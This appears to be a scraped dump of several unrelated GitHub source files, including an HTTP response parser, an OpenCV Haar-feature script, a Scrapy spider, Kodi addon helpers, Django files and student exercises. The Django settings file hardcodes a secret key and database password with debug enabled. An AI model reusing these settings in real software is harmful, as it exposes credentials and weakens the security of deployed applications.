<!doctype html><html lang=\\"en\\"><head><meta charset=\\"utf-8\\"/><link rel=\\"icon\\" href=\\"/favicon.ico\\"/><meta name=\\"viewport\\" content=\\"width=device-width,initial-scale=1\\"/><meta name=\\"theme-color\\" content=\\"#000000\\"/><link rel=\\"apple-touch-icon\\" href=\\"/logo192.png\\"/><link rel=\\"manifest\\" href=\\"/manifest.json\\"/><link rel=\\"apple-touch-icon\\" sizes=\\"180x180\\" href=\\"/apple-touch-icon.png\\"><link rel=\\"icon\\" type=\\"image/png\\" sizes=\\"32x32\\" href=\\"/favicon-32x32.png\\"><link rel=\\"icon\\" type=\\"image/png\\" sizes=\\"16x16\\" href=\\"/favicon-16x16.png\\"><link rel=\\"manifest\\" href=\\"/site.webmanifest\\"><title>COVID-19 Tracker | India</title><meta name=\\"title\\" content=\\"COVID-19 Tracker | India\\"><meta name=\\"description\\" content=\\"Volunteer-driven crowdsourced initiative to track the spread of Coronavirus (COVID-19) in India\\"><meta name=\\"keywords\\" content=\\"coronavirus,corona,covid,covid19,covid-19,covidindia,india,virus\\"><meta property=\\"og:type\\" content=\\"website\\"><meta property=\\"og:url\\" content=\\"https://www.covid19india.org\\"><meta property=\\"og:title\\" content=\\"COVID-19 Tracker | India\\"><meta property=\\"og:description\\" content=\\"Volunteer-driven crowdsourced initiative to track the spread of Coronavirus (COVID-19) in India\\"><meta property=\\"og:image\\" content=\\"/thumbnail.png\\"><meta property=\\"twitter:card\\" content=\\"summary_large_image\\"><meta property=\\"twitter:url\\" content=\\"https://www.covid19india.org\\"><meta property=\\"twitter:title\\" content=\\"COVID-19 Tracker | India\\"><meta property=\\"twitter:description\\" content=\\"Volunteer-driven crowdsourced initiative to track the spread of Coronavirus (COVID-19) in India\\"><meta property=\\"twitter:image\\" content=\\"/thumbnail.png\\"><link href=\\"/static/css/main.efe1529d.chunk.css\\" rel=\\"stylesheet\\"></head><body><noscript>You need to enable JavaScript to run this app.</noscript><div id=\\"root\\"></div><script>!function(e){function r(r){for(var n,i,l=r[0],a=r[1],f=r[2],p=0,s=[];p<l.length;p++)i=l[p],Object.prototype.hasOwnProperty.call(o,i)&&o[i]&&s.push(o[i][0]),o[i]=0;for(n in a)Object.prototype.hasOwnProperty.call(a,n)&&(e[n]=a[n]);for(c&&c(r);s.length;)s.shift()();return u.push.apply(u,f||[]),t()}function t(){for(var e,r=0;r<u.length;r++){for(var t=u[r],n=!0,l=1;l<t.length;l++){var a=t[l];0!==o[a]&&(n=!1)}n&&(u.splice(r--,1),e=i(i.s=t[0]))}return e}var n={},o={1:0},u=[];function i(r){if(n[r])return n[r].exports;var t=n[r]={i:r,l:!1,exports:{}};return e[r].call(t.exports,t,t.exports,i),t.l=!0,t.exports}i.m=e,i.c=n,i.d=function(e,r,t){i.o(e,r)||Object.defineProperty(e,r,{enumerable:!0,get:t})},i.r=function(e){\\"undefined\\"!=typeof Symbol&&Symbol.toStringTag&&Object.defineProperty(e,Symbol.toStringTag,{value:\\"Module\\"}),Object.defineProperty(e,\\"__esModule\\",{value:!0})},i.t=function(e,r){if(1&r&&(e=i(e)),8&r)return e;if(4&r&&\\"object\\"==typeof e&&e&&e.__esModule)return e;var t=Object.create(null);if(i.r(t),Object.defineProperty(t,\\"default\\",{enumerable:!0,value:e}),2&r&&\\"string\\"!=typeof e)for(var n in e)i.d(t,n,function(r){return e[r]}.bind(null,n));return t},i.n=function(e){var r=e&&e.__esModule?function(){return e.default}:function(){return e};return i.d(r,\\"a\\",r),r},i.o=function(e,r){return Object.prototype.hasOwnProperty.call(e,r)},i.p=\\"/\\";var l=this.webpackJsonpcovid19india=this.webpackJsonpcovid19india||[],a=l.push.bind(l);l.push=r,l=l.slice();for(var f=0;f<l.length;f++)r(l[f]);var c=a;t()}([])</script><script src=\\"/static/js/2.d8d2fdfc.chunk.js\\"></script><script src=\\"/static/js/main.ebb1defd.chunk.js\\"></script></body><script async src=\\"https://www.googletagmanager.com/gtag/js?id=UA-160698988-1\\"></script><script>function gtag(){dataLayer.push(arguments)}window.dataLayer=window.dataLayer||[],gtag(\\"js\\",new Date),gtag(\\"config\\",\\"UA-160698988-1\\")</script></html>\n\";\n";
| [
"noreply@github.com"
] | pavankumarmeruva.noreply@github.com |
e85d89a65920bd230348b41cb77c529402e4c82e | e7397ed7c8a79b1df463205ccf8358a183f51d68 | /venv/Lib/site-packages/aiourllib/response.py | 5bf90d796885539c1d25f4126078ade10641c607 | [] | no_license | yzx6151211/test | 7515a1e15fa16d1ba35a6af3afcd331e579427c0 | 59ffb77c240dc7e3f18d45e0d0863b9080c9fe40 | refs/heads/master | 2023-03-31T10:57:11.523739 | 2021-04-08T02:00:12 | 2021-04-08T02:00:12 | 355,732,822 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 8,672 | py | import asyncio
import collections
import json
import re
import gzip
import zlib
from . import (
exc,
utils)
class ResponseException(Exception):
pass
class TransferEncodingException(ResponseException):
pass
class ContentEncodingException(ResponseException):
pass
class Protocol(object):
COLON = ':'
HTTP = 'HTTP/'
REGEX_CHARSET = re.compile(r';\s*charset=([^;]*)', re.I)
REGEX_TOKEN = re.compile(
r'([a-zA-Z][a-zA-Z_-]*)\s*(?:=(?:"([^"]*)"|'
r'([^ \t",;]*)))?')
@classmethod
def parse_status(cls, status):
if status.startswith(cls.HTTP):
http_version, status_code, status_text = status.split(None, 2)
status = '{} {}'.format(
utils.smart_text(status_code),
utils.smart_text(status_text))
return status
@classmethod
def parse_status_code(cls, status):
return int(status.split()[0])
@classmethod
def parse_charset(cls, header, charset):
match = cls.REGEX_CHARSET.search(utils.smart_text(header))
if match:
charset = match.group(1)
return charset
@classmethod
def parse_cache_control(cls, header):
header = utils.smart_text(header)
cache = {}
for match in cls.REGEX_TOKEN.finditer(header):
name = match.group(1)
value = match.group(2) or match.group(3) or None
if value and value.isdigit():
value = int(value)
cache[name] = value
cache_control = {}
for n in [
'public',
'no-store',
'no-transform',
'must-revalidate',
'proxy-revalidate',
]:
if n not in cache:
continue
cache_control[n] = None
for n, v in cache.items():
if n not in [
'private',
'no-cache',
'max-age',
's-maxage',
'stale-while-revalidate',
'stale-if-error',
]:
continue
cache_control[n] = v
return cache_control
class Response(object):
PROTOCOL = Protocol
CONTENT_TYPE = 'text/html'
CHARSET = 'UTF-8'
def __init__(
self,
connection,
status=None,
headers=None,
):
self.connection = connection
self.status = status
self.headers = headers
self._status_code = None
self._content_encoding = None
self._content_length = None
self._content_type = self.CONTENT_TYPE
self._charset = self.CHARSET
self._cache_control = None
self._transfer_encoding = None
self._content = None
@property
def status_code(self):
if not self._status_code:
self._status_code = self.PROTOCOL.parse_status_code(self.status)
return self._status_code
@property
def content_length(self):
if (not self._content_length) and self.has_header('Content-Length'):
self._content_length = int(self.get_header('Content-Length'))
return self._content_length
@property
def content_type(self):
if (not self._content_type) and self.has_header('Content-Type'):
self._content_type = \
utils.smart_text(self.get_header('Content-Type'))
return self._content_type
@property
def content_encoding(self):
if not self._content_encoding:
if self.has_header('Content-Encoding'):
self._content_encoding = \
utils.smart_text(self.get_header('Content-Encoding'))
else:
self._content_encoding = 'identity'
return self._content_encoding
@property
def transfer_encoding(self):
if not self._transfer_encoding:
if self.has_header('Transfer-Encoding'):
self._transfer_encoding = \
utils.smart_text(self.get_header('Transfer-Encoding'))
else:
self._transfer_encoding = 'identity'
return self._transfer_encoding
@property
def charset(self):
if (not self._charset) and self.content_type:
self._charset = self.PROTOCOL.parse_charset(
self.content_type, self._charset)
return self._charset
@property
def cache_control(self):
if (not self._cache_control) and self.has_header('Cache-Control'):
self._cache_control = self.PROTOCOL.parse_cache_control(
self.get_header('Cache-Control'))
return self._cache_control
def get_header(self, header):
mapping = {h.lower(): h for h in self.headers}
header = header.lower()
if header in mapping:
return self.headers[mapping[header]]
def has_header(self, header):
mapping = {h.lower(): h for h in self.headers}
header = header.lower()
return header in mapping
async def read_coro(self, coro):
try:
return await asyncio.wait_for(coro, self.connection.read_timeout)
except asyncio.TimeoutError:
raise exc.ReadTimeout
async def read_headers(self):
coro = self.connection.socket.reader.readline()
status = (await self.read_coro(coro)).strip()
status = utils.smart_text(status, 'latin-1')
self.status = self.PROTOCOL.parse_status(status)
self.headers = collections.OrderedDict()
while True:
coro = self.connection.socket.reader.readline()
line = (await self.read_coro(coro)).strip()
line = utils.smart_text(line, 'latin-1')
if not line:
break
try:
header, value = line.split(self.PROTOCOL.COLON, 1)
except ValueError:
raise ValueError('Bad header line: {}'.format(
utils.smart_text(line)))
header = utils.smart_text(header.strip(), 'latin-1')
value = utils.smart_text(value.strip(), 'latin-1')
self.headers[header] = value
def read(self):
if self.transfer_encoding == 'chunked':
return self._read_chunks()
elif self.transfer_encoding == 'deflate':
return self._read_deflate()
elif self.transfer_encoding == 'gzip':
return self._read_gzip()
elif self.transfer_encoding == 'identity':
return self._read_identity()
else:
raise TransferEncodingException(self.transfer_encoding)
async def _read_chunks(self):
content = b''
while True:
coro = self.connection.socket.reader.readline()
chunk_size = await self.read_coro(coro)
chunk_size = chunk_size.strip()
if not chunk_size:
break
chunk_size = int(chunk_size, base=16)
coro = self.connection.socket.reader.readexactly(chunk_size)
r = await self.read_coro(coro)
if not r:
break
content += r
coro = self.connection.socket.reader.readline()
await self.read_coro(coro)
return content
async def _read_deflate(self):
return zlib.decompress(await self.read_identity())
async def _read_gzip(self):
return gzip.decompress(await self.read_identity())
async def _read_identity(self):
content = b''
while len(content) < self.content_length:
chunk_size = self.content_length - len(content)
coro = self.connection.socket.reader.read(chunk_size)
r = await self.read_coro(coro)
if r:
content += r
else:
break
return content
async def read_content(self):
if not self._content:
content = await self.read()
if self.content_encoding == 'deflate':
content = zlib.decompress(content)
elif self.content_encoding == 'gzip':
content = gzip.decompress(content)
elif self.content_encoding == 'identity':
pass
else:
raise ContentEncodingException(self.content_encoding)
self._content = content
return self._content
async def read_text(self):
content = await self.read_content()
return content.decode(self.charset)
async def read_json(self):
content = await self.read_text()
return json.loads(content)
def close(self):
self.connection.socket.writer.close()
| [
"523882246@qq.com"
] | 523882246@qq.com |
a3ae2ee8ebc61a3af3ad97aa79f0e6bfa8f005c2 | fe002077b2e8135e322a7939b3a7be27473650f9 | /opencv_python/0820.py | ac29e6d01bdefc7653953af0012e242e004654bb | [] | no_license | leekyungjin333/LinuxGUIex | 94d903b39c32f1a0f6d0396c5710a28edf2a39d7 | 6972cfff681e8d6568f41069c99c0394198618fe | refs/heads/master | 2020-07-16T11:12:30.785506 | 2019-09-06T04:13:20 | 2019-09-06T04:13:20 | 205,778,526 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,618 | py | # 0820.py
import cv2
import numpy as np
#1
def rectSum(sumImage, rect):
x, y, w, h = rect
a = sumImage[y, x]
b = sumImage[y, x+w]
c = sumImage[y+h, x]
d = sumImage[y+h, x+w]
return a + d - b - c
def compute_Haar_feature1(sumImage):
rows, cols = sumImage.shape
rows -= 1
cols -= 1
f1 = []
for y in range(0, rows):
for x in range(0, cols):
for h in range(1, rows-y+1):
for w in range(1, (cols-x)//2+1):
s1 = rectSum(sumImage, (x, y, w, h))
s2 = rectSum(sumImage, (x+w,y, w, h))
f1.append([1, x, y, w, h, s1-s2])
return f1
def compute_Haar_feature2(sumImage):
rows, cols = sumImage.shape
rows -= 1
cols -= 1
f2 = []
for y in range(0, rows):
for x in range(0, cols):
for h in range(1, (rows-y)//2+1):
for w in range(1, cols-x+1):
s1 = rectSum(sumImage, (x, y, w, h))
s2 = rectSum(sumImage, (x,y+h, w, h))
f2.append([2, x, y, w, h, s2-s1])
return f2
def compute_Haar_feature3(sumImage):
rows, cols = sumImage.shape
rows -= 1
cols -= 1
f3 = []
for y in range(0, rows):
for x in range(0, cols):
for h in range(1, rows-y+1):
for w in range(1, (cols-x)//3+1):
s1 = rectSum(sumImage, (x, y, w, h))
s2 = rectSum(sumImage, (x+w, y, w, h))
s3 = rectSum(sumImage, (x+2*w,y, w, h))
f3.append([3, x, y, w, h, s1-s2+s3])
return f3
def compute_Haar_feature4(sumImage):
rows, cols = sumImage.shape
rows -= 1
cols -= 1
f4 = []
for y in range(0, rows):
for x in range(0, cols):
for h in range(1, (rows-y)//3+1):
for w in range(1, cols-x+1):
s1 = rectSum(sumImage, (x, y, w, h))
s2 = rectSum(sumImage, (x,y+h, w, h))
s3 = rectSum(sumImage, (x,y+2*h, w, h))
f4.append([4, x, y, w, h, s1-s2+s3])
return f4
def compute_Haar_feature5(sumImage):
rows, cols = sumImage.shape
rows -= 1
cols -= 1
f5 = []
for y in range(0, rows):
for x in range(0, cols):
for h in range(1, (rows-y)//2+1):
for w in range(1, (cols-x)//2+1):
s1 = rectSum(sumImage, (x, y, w, h))
s2 = rectSum(sumImage, (x+w,y, w, h))
s3 = rectSum(sumImage, (x, y+h, w, h))
s4 = rectSum(sumImage, (x+w,y+h, w, h))
f5.append([5, x, y, w, h, s1-s2-s3+s4])
return f5
#2
gray = cv2.imread('./data/lenaFace24.jpg', cv2.IMREAD_GRAYSCALE) # 24 x 24
gray_sum = cv2.integral(gray)
f1 = compute_Haar_feature1(gray_sum)
n1 = len(f1)
print('len(f1)=',n1)
for i, a in enumerate(f1[:2]):
print('f1[{}]={}'.format(i, a))
#3
f2 = compute_Haar_feature2(gray_sum)
n2 = len(f2)
print('len(f2)=',n2)
for i, a in enumerate(f2[:2]):
print('f2[{}]={}'.format(i, a))
#4
f3 = compute_Haar_feature3(gray_sum)
n3 = len(f3)
print('len(f3)=',n3)
for i, a in enumerate(f3[:2]):
print('f3[{}]={}'.format(i, a))
#5
f4 = compute_Haar_feature4(gray_sum)
n4 = len(f4)
print('len(f4)=',n4)
for i, a in enumerate(f4[:2]):
print('f4[{}]={}'.format(i, a))
#6
f5 = compute_Haar_feature5(gray_sum)
n5 = len(f5)
print('len(f5)=',n5)
for i, a in enumerate(f5[:2]):
print('f5[{}]={}'.format(i, a))
print('total features =', n1+n2+n3+n4+n5)
| [
"leekyungjin333@users.noreply.github.com"
] | leekyungjin333@users.noreply.github.com |
21eebbc0b1756a0f6d929b7deaf6b26650c96230 | 6445533255d69bd5fe3ea80fdb2b10c14ef03f70 | /Clinic_Essentials/apps.py | 6f44fd8d440aa45c13047df5101b085c36277d45 | [] | no_license | 17shashank17/Clinic | ed37458bb059f1691ccbbdd57a4364899e93c2fc | 3b0647600a6a0b826635d8e3c7b958b749732d6e | refs/heads/master | 2020-09-30T19:42:28.434286 | 2019-12-11T12:19:04 | 2019-12-11T12:19:04 | 227,359,030 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 108 | py | from django.apps import AppConfig
class ClinicEssentialsConfig(AppConfig):
name = 'Clinic_Essentials'
| [
"17shashank17@gmail.com"
] | 17shashank17@gmail.com |
0d8b96bf89c8d646fecdd498d7573ec350c21dbf | 966edfa4539288983c39c7dfc2ad003fa608ee4e | /rolling_ops (1).py | 1265f499bfa1fc06835da61941be289f2b4e0513 | [] | no_license | btindol178/Algorithmic-Trading | ee2b067d7476dadd0dc6d0af765a8a56924a5dae | 99dbad5ec3d496d26dddacd6f5d155921c3c3ea4 | refs/heads/main | 2023-05-04T10:01:51.765390 | 2021-06-01T16:06:05 | 2021-06-01T16:06:05 | 346,842,518 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 1,430 | py | # =============================================================================
# Import OHLCV data and perform basic data operations
# Author : Mayank Rasu (http://rasuquant.com/wp/)
# Please report bug/issues in the Q&A section
# =============================================================================
# Import necesary libraries
import datetime as dt
import yfinance as yf
import pandas as pd
# Download historical data for required stocks
tickers = ["MSFT","AMZN","AAPL","CSCO","IBM","FB"]
start = dt.datetime.today()-dt.timedelta(3650)
end = dt.datetime.today()
close_prices = pd.DataFrame() # empty dataframe which will be filled with closing prices of each stock
# looping over tickers and creating a dataframe with close prices
for ticker in tickers:
close_prices[ticker] = yf.download(ticker,start,end)["Adj Close"]
close_prices.fillna(method='bfill',axis=0,inplace=True) #replace NaN values using backfill method
close_prices.dropna(axis=0,inplace=True) #drop row containing any NaN value
daily_return = close_prices.pct_change() # Creates dataframe with daily return for each stock" are missing
# Rolling mean and standard deviation
daily_return.rolling(window=20).mean() # simple moving average
daily_return.rolling(window=20).std()
daily_return.ewm(span=20,min_periods=20).mean() # exponential moving average
daily_return.ewm(span=20,min_periods=20).std()
| [
"noreply@github.com"
] | btindol178.noreply@github.com |
bf00d39dfbcf3248fb20c2c1c1e443dd5b17008f | 9b4b3ca4f48c170c33575af59be737208a23389c | /Forum/Forum/forumapp/admin.py | 6dd93e2f7ad6a19d034a2c74b08d92edb08bae25 | [] | no_license | DanielStankovych/fifth-project | b54e787f1c3016a3fafd59941d874bd2b193dc3a | 0415401681fc1d49d02a87c7fc26488176f91d7e | refs/heads/master | 2023-08-22T17:45:18.261348 | 2019-11-14T10:52:06 | 2019-11-14T10:52:06 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 281 | py | from django.contrib import admin
from . import models
from .models import Category
from .models import Post
from .models import Profile
# Register your models here.
admin.site.register(models.Post)
admin.site.register(models.Category)
admin.site.register(Profile)
| [
"noreply@github.com"
] | DanielStankovych.noreply@github.com |
d25ebbe6badfd094abd005663fc100b84313ce48 | 81829702fe531aa34a1a39d209cd9a27ad717133 | /fiubauth/settings.py | 638aea82d0c7e49c4d695d6427a6e53363622348 | [
"MIT"
] | permissive | MartinCura/fiubauth | 3b2fd9d798baf47a88382c7d76b26996d30740d8 | 61e344082956a56c76c0e9d68c72778e90cd1f93 | refs/heads/master | 2022-02-08T15:56:00.195792 | 2021-06-09T19:49:05 | 2021-06-09T19:49:05 | 171,236,958 | 0 | 0 | MIT | 2022-01-24T15:44:52 | 2019-02-18T07:39:14 | Python | UTF-8 | Python | false | false | 3,302 | py | """
Django settings for fiubauth project.
"""
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/2.1/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = '9v2bo67akl(hv0leq1dogn4+qi@z8m-f4f46y+t8@qrso)90js'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'fiuba.apps.FiubaConfig',
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'oidc_provider',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
#'django.middleware.locale.LocaleMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'fiubauth.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': ['fiubauth/templates/'], # why was this necessary?
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'fiubauth.wsgi.application'
# Database
# https://docs.djangoproject.com/en/2.1/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.postgresql', # .postgresql_psycopg2
'NAME': 'fiubauth_db',
'USER': 'fiubauth',
'PASSWORD': 'fiupass',
'HOST': 'localhost',
'PORT': '', # '5432',
}
}
# Password validation
# https://docs.djangoproject.com/en/2.1/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/2.1/topics/i18n/
LANGUAGE_CODE = 'es-AR' # 'en-us'
TIME_ZONE = 'America/Argentina/Buenos_Aires'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/2.1/howto/static-files/
STATIC_URL = '/static/'
# Other
LOGIN_URL = '/accounts/login/'
LOGIN_REDIRECT_URL = '/'
LOGOUT_REDIRECT_URL = '/accounts/login'
# OIDC Provider
OIDC_SESSION_MANAGEMENT_ENABLE = True
| [
"martincura@gmail.com"
] | martincura@gmail.com |
3d2c1cf2f0fd2003ca03ac47c8cb4bc4f252c788 | e906dfa9290ed6d43f0d99898e6714f9e2712daa | /Problem001.py | 8aca21d55ce3a32342321f93f5c120afaa71e010 | [] | no_license | onp/ProjectEuler-py | 9fa80ab0e85ac29f04c05f63a367b49e50aa5aa8 | 3fa17a9b7d154ba48b04f9ac6884df1a3fb812be | refs/heads/master | 2021-01-23T17:30:51.284281 | 2014-03-12T23:40:01 | 2014-03-12T23:40:01 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 331 | py | # Project Euler Problem #1
# Multiples of 3 and 5
''' If we list all the natural numbers below 10 that are multiples of 3 or 5,
we get 3, 5, 6 and 9. The sum of these multiples is 23.
Find the sum of all the multiples of 3 or 5 below 1000.
'''
a= [x for x in range(1000) if (x%3==0)|(x%5==0)]
print(sum(a))
# A= 233168 | [
"a.more.reliable.source@gmail.com"
] | a.more.reliable.source@gmail.com |
96fd35a1314f73aa37ac76aef4bb32df8cc4fe3a | cd052f960846ea33e22abdded3106fb492f16c31 | /爬虫项目/code09/ITCast/ITCast/spiders/itcast.py | ed76197004fcb89ff0c9826496a95830942d4f4d | [] | no_license | byst4nder/his_spider | 2d96457b70894c36506e8061d8a3201ac337a5d0 | a51e31acff41292e568ac22b0e213e6cb48218fa | refs/heads/master | 2020-07-21T12:06:28.952083 | 2019-09-06T14:25:58 | 2019-09-06T14:25:58 | 206,857,595 | 1 | 0 | null | 2019-09-06T19:04:02 | 2019-09-06T19:04:02 | null | UTF-8 | Python | false | false | 1,322 | py | # coding:utf-8
# 可以通过命令创建爬虫
# #scrapy genspider itcast itcast.cn
import scrapy
from ..items import ItcastItem
class ItcastSpider(scrapy.Spider):
name = "itcast"
allowed_domains = ["itcast.cn"]
start_urls = ["http://www.itcast.cn/channel/teacher.shtml"]
def parse(self, response):
node_list = response.xpath("//div[@class='li_txt']")
# 迭代取出每个老师信息,并保存在item中
for node in node_list:
item = ItcastItem()
item['name'] = node.xpath("./h3/text()").extract_first()
item['title'] = node.xpath("./h4/text()").extract_first()
item['info'] = node.xpath("./p/text()").extract_first()
yield item
# 1. scrapy crawl itcast -o itcast.json (csv、xml、jl)
# 2. 如果需要将数据存储到scrpay不支持的格式里,比如数据库等,就必须通过管道实现
#engine.py
# Engine里的每次for迭代 parse() 方法,用来处理一个response响应提取的数据(请求、item)
# for result in spider.parse(response):
# if isinstance(result, scrapy.Item):
# pipeline.process_item(resutl, spider)
# elif isinstance(result, scrapy.Request):
# scheduler.add_request(result)
| [
"mac@macdeMacBook-Pro.local"
] | mac@macdeMacBook-Pro.local |
e8dce776e101aefc99de1b30282da6ad07504850 | 53dfc1a19373bd068fdc1673e1542867836ba985 | /test.py | 78d52ad3045bf8c2c785c812387af9ea4c8db660 | [] | no_license | mivanrm/UDP-file-transfer | efd3ea4036d747436642220eb8b86f2fea6e641f | 7e44ae323e7213ccbfde6b71d1b145a86ad48553 | refs/heads/master | 2022-02-26T20:53:43.442329 | 2019-09-26T16:34:07 | 2019-09-26T16:34:07 | 210,993,249 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 35 | py | f=open("abc.txt","rb")
f.__sizeof__ | [
"mivanrm12@gmail.com"
] | mivanrm12@gmail.com |
d17b309bad63ad2a121a0fc94c0e27562b2357a8 | 094fe32f3144ee03d53df10ae3e8518f372d6b62 | /service.prb-clean/resources/lib/commontasks.py | 812457d26b2a7dcd5a653b0159269762f34d0c3b | [] | no_license | PhantomRaspberryBlower/repository.prb-entertainment-pack | 0b72ad49b4183c8b45b704295beadf09831f23a3 | 02e103228ad86aee3d8cef6fac3806c1f3605f45 | refs/heads/master | 2022-06-19T04:14:07.841398 | 2022-05-17T09:53:21 | 2022-05-17T09:53:21 | 192,784,863 | 10 | 3 | null | null | null | null | UTF-8 | Python | false | false | 1,543 | py | #!/bin/python
import os
import xbmc
import xbmcgui
import shutil
import re
'''
Written by: Phantom Raspberry Blower
Date: 21-08-2017
Description: Common Tasks for Addons
'''
INVALID_FILENAME_CHARS = '\/:*?"<>|'
def remove_tree(dir_path):
shutil.rmtree(dir_path, ignore_errors=True)
def xbmc_version():
return float(xbmc.getInfoLabel("System.BuildVersion")[:4])
def notification(title, message, ms, nart):
xbmc.executebuiltin("XBMC.notification(" +
title + "," +
message + "," +
ms + "," + nart + ")")
def message(message, title):
# Display message to user
dialog = xbmcgui.Dialog()
dialog.ok(title, message)
def read_from_file(path):
try:
f = open(path, 'r')
r = f.read()
f.close()
return str(r)
except:
return None
def write_to_file(path, content, append=False):
try:
if append:
f = open(path, 'a')
else:
f = open(path, 'w')
f.write(content)
f.close()
return True
except:
return False
def regex_from_to(text, from_string, to_string, excluding=True):
if excluding:
r = re.search("(?i)" + from_string +
"([\S\s]+?)" +
to_string, text).group(1)
else:
r = re.search("(?i)(" +
from_string +
"[\S\s]+?" +
to_string +
")", text).group(1)
return r
| [
"jasonbulis@hotmail.com"
] | jasonbulis@hotmail.com |
ea5590f27ece0d76b627816b057ee992c98f014b | 5ed7df827c86692ce02d51580a2d1feeb409c087 | /Freshman Year/CS111/Problem Set 2/ps2pr4.py | 793d2d77e09d390c3dea883a7ea6d24177caed37 | [] | no_license | Aweirdanomaly/SchoolWork | 713d8cb9eaea66cc4042e0f638f3eee7c04493af | 9f4e97e7e56e22953bf097c131ca6b5555bfe6ee | refs/heads/main | 2023-02-13T18:45:03.970543 | 2021-01-08T08:10:11 | 2021-01-08T08:10:11 | 325,880,151 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 901 | py | # -*- coding: utf-8 -*-
"""
Created on Mon Sep 23 23:37:54 2019
@author: Carlos
"""
# Problem 4 part 1
def copy(s, n):
"""takes in string 's' and integer 'n' and copies 's' 'n' times"""
if n <= 0:
return ''
else:
b = copy(s, n-1)
return b + s
#Problem 4 part 2
def compare(list1, list2):
""" takes in two lists 'list1' and 'list2' and returns how
many values in 'list1' are less than those in 'list2'"""
if list1 == [] or list2 == []:
return 0
else:
b = compare(list1[1:], list2[1:])
if list1[0] < list2[0]:
return b+1
else:
return b
#Problem 4 part 3
def double(s):
""" takes in string 's' and copies all of its characters
nest to the original ones """
if s == '':
return ''
else:
b = double(s[0:-1])
return s[-1] + s[-1] | [
"carlosarielos2@gmail.com"
] | carlosarielos2@gmail.com |
68bf009de745f3d83520e2323ac43fc8e2a5e812 | f9bf38f58e56f4cc6f9170bf05b874c1247f7c29 | /Source/analyze.py | 1e9f8bf666962482601db6271dcd4f8b07249cce | [] | no_license | e2Xg/ThesisSource | ad2fd6c3494e13bbe57fc311865169353e86b548 | f8a0d0a1fa4104b2e74890583c6773cc06ec9a44 | refs/heads/master | 2022-05-16T03:04:53.801277 | 2019-09-17T03:45:06 | 2019-09-17T03:45:06 | 186,252,293 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,573 | py | # -*- coding: utf-8 -*-
import numpy as np
import pandas as pd
from Source.analyze_geometry import analyze_geometry
from Source.Engine.engine_performance import engine_performance
from Source.analyze_weight import analyze_weight
from Source.analyze_aerodynamics import analyze_aerodynamics
from Source.analyze_point_performance import analyze_point_performance
def analyze(design_input,geometry_input,engine_input,point_performance_input=None,onlyobjectives=False):
"""
Description:
Finds geometrical, mass, aerodynamic properties of aircraft using all inputs
Variables:
>>> design_input : All design inputs data block.
>>> geometry_input : All geometry input data block.
"""
#Analyze geometrical, mass, aerodynamic properties
# Analyze Geometry
geometry_data = analyze_geometry(geometry_input)
# Analyze Weight
# Set parameters to 0.0
XL = 0.0; TR = 0.0; SPAN = 0.0; SW = 0.0; AR = 0.0
LE_SWEEP = 0.0; QC_SWEEP = 0.0; TCA = 0.0; ULF = 0.0
PCTL = 1.0; SFLAP = 0.0; NEW = 0; FNEF = 0; SHT = 0.0
NVERT = 0; TRVT = 0.0; SVT = 0.0; ARVT = 0.0; SWPVT = 0.0
SCAN = 0.0; TRCAN = 0.0; WLDPAYLOAD = 0.0; NFIN = 0
SFIN = 0.0; TRFIN = 0.0; THRUST = 0.0; WF = 0.0
DF = 0.0; VMAX = 0.0; WPAINT = 0.0; SWTWG = 0.0
SWTHT = 0.0; SWTVT = 0.0; SWTFU = 0.0; SWTCN = 0.0
WENG = 0.0; NENG = 0; FPAREA = 0.0; WARM = 0.0
WMARG = 0.0; WPAYLOAD = 0.0; TOTVOLFUSF = 0.0
FUELDENSITY = 0.0; NTANK = 0
# Set values based on design data
VMAX = design_input.loc["Maximum Mach Number","Value"]
ULF = design_input.loc["Ultimate Load Factor","Value"]
NEW = design_input.loc["Number of Engines at Wing","Value"]
FNEF = design_input.loc["Number of Engines at Fuselage","Value"]
NENG = design_input.loc["Total Number of Engines","Value"]
WARM = design_input.loc["Armanent Weight","Value"]
WPAYLOAD = design_input.loc["Design Payload Weight","Value"]
WLDPAYLOAD = design_input.loc["Maximum Payload Weight","Value"]
WPAINT = design_input.loc["Paint Weight per Square Meters","Value"]
WMARG = design_input.loc["Empty Weight Margin %","Value"]
